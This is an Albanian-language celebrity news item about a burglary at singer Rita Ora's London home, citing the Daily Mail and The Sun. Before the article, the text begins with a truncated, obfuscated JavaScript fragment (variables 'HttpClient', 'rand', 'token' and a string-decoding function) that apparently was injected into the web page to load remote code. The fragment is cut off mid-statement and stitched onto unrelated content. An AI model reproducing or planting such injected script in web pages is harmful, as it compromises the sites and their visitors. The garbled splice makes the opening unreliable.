;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Plaçkitet shtëpia e Rita Orës

By

Shtëpia e Rita Orës ka rënë pre e hajdutëve në orët e para të 28 Nëntorit.

Lajmi është bërë i ditur sot nga gazeta “DailyMail”, që shkruan se dyshohet që grabitësit të jenë e njëjta bandë profesionale që grabiti është shtëpinë e Simon Cowell.

Nga vila e Ritës mësohet të jenë marrë bizhuteri, para dhe paisje elektronike. Ende nuk dihet vlera e sendeve të grabitura në shtëpinë e yllit 25 – vjeçar.

Një burim pranë artistes tha për “The Sun” se Rita ndihet e tronditur nga kjo ngjarje. ‘Fatmirësisht, Rita nuk ishte në shtëpi në atë moment por një anëtar i familjes ishte duke fjetur në katin e sipërm, kështuqë do ishte edhe më keq nëse ata do të shqetësoheshin’ – shprehet burimi.

Autoritet londineze mësohet se kanë nisur hetimet për identifikimin dhe kapjen e kësaj bande hajdutësh, që dyshohet të jetë përgjegjëse për vjedhje në disa shtëpi në kryeqytetin britanik.

“Dailymail” shkruan se policia i ka thënë Ritës që të mos e përjashtojë mundësinë që grabitësit mund të jenë njerëz pranë saj, një dyshim ky i ngritur edhe nga Simon Cowell të cilit iu vodhën gjëra me vlerë prej gjysmë milioni paundësh pak javë më parë.

 

Artikuj të ngjashëm